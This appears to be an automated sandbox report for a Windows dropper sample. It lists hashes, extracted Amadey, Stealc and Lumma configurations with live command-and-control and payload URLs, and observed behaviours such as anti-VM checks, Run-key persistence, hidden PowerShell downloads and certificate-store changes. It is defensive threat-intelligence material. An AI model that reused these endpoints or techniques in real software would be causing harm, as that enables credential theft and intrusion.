Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
111s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25/01/2025, 16:40
Static task
static1
Behavioral task
behavioral1
Sample
afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe
Resource
win7-20241010-en
General
-
Target
afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe
-
Size
1.9MB
-
MD5
b58f41c35fe6b79046d9aa084a175eb9
-
SHA1
7b18e2694be1d189282b8b59f391e298aa9d88ee
-
SHA256
afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967
-
SHA512
7e9bd888e41a2bb3f07f5f63d236ee491c5265ef6014f9adee03411276d53d104511a00eddb5653663e037561fe0c84b7c0d986ac4f3332fa4c1928d837bcccf
-
SSDEEP
24576:pVSxYYf9Y/cLwPA5g3whoyTMZbBlJhRi6JAYcuR45J5XKCHat/STYu0ZnebEone5://TPAowhZMfbiPYFG5fFHGugneAAPk
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://toppyneedus.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7a5595e3ff.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4a5a8f7ce6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b47b7bcbc1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 46286aabf6.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 140 3032 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3032 powershell.exe -
Downloads MZ/PE file 8 IoCs
flow pid Process 5 2840 skotes.exe 18 2840 skotes.exe 18 2840 skotes.exe 18 2840 skotes.exe 18 2840 skotes.exe 132 2840 skotes.exe 132 2840 skotes.exe 140 3032 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b47b7bcbc1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7a5595e3ff.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4a5a8f7ce6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 46286aabf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4a5a8f7ce6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b47b7bcbc1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 46286aabf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7a5595e3ff.exe -
Executes dropped EXE 12 IoCs
pid Process 2840 skotes.exe 1788 EzbI6jr.exe 1680 EzbI6jr.exe 700 9d9ff84207.exe 1096 4a5a8f7ce6.exe 1824 Macromedia.com 1688 b47b7bcbc1.exe 2548 46286aabf6.exe 816 29b1d0bfe9.exe 2800 bf8b735584.exe 1644 TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE 3296 7a5595e3ff.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 7a5595e3ff.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 4a5a8f7ce6.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine b47b7bcbc1.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 46286aabf6.exe -
Loads dropped DLL 24 IoCs
pid Process 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 2840 skotes.exe 1788 EzbI6jr.exe 3004 WerFault.exe 3004 WerFault.exe 3004 WerFault.exe 3004 WerFault.exe 3004 WerFault.exe 2840 skotes.exe 700 9d9ff84207.exe 2840 skotes.exe 2840 skotes.exe 2208 cmd.exe 2840 skotes.exe 2840 skotes.exe 2840 skotes.exe 2840 skotes.exe 2840 skotes.exe 2840 skotes.exe 3032 powershell.exe 3032 powershell.exe 2840 skotes.exe 2840 skotes.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\46286aabf6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052919001\\46286aabf6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\29b1d0bfe9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052920001\\29b1d0bfe9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\bf8b735584.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052921001\\bf8b735584.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\b47b7bcbc1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052918001\\b47b7bcbc1.exe" skotes.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a3fd-668.dat autoit_exe behavioral1/files/0x000500000001a438-697.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2140 tasklist.exe 2316 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 2840 skotes.exe 1096 4a5a8f7ce6.exe 1688 b47b7bcbc1.exe 2548 46286aabf6.exe 1644 TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE 3296 7a5595e3ff.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1788 set thread context of 1680 1788 EzbI6jr.exe 32 -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\AttacksContacted 9d9ff84207.exe File created C:\Windows\Tasks\skotes.job afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe File opened for modification C:\Windows\SchedulesAb 9d9ff84207.exe File opened for modification C:\Windows\ContainsBefore 9d9ff84207.exe File opened for modification C:\Windows\TokenDetroit 9d9ff84207.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3004 1788 WerFault.exe 31 3740 3636 WerFault.exe 84 -
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4a5a8f7ce6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 29b1d0bfe9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 29b1d0bfe9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9d9ff84207.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b47b7bcbc1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 46286aabf6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 29b1d0bfe9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Macromedia.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EzbI6jr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EzbI6jr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf8b735584.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2320 taskkill.exe 652 taskkill.exe 2056 taskkill.exe 2096 taskkill.exe 1740 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 9 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e EzbI6jr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4a5a8f7ce6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4a5a8f7ce6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4a5a8f7ce6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 EzbI6jr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e EzbI6jr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 4a5a8f7ce6.exe Set value (data) 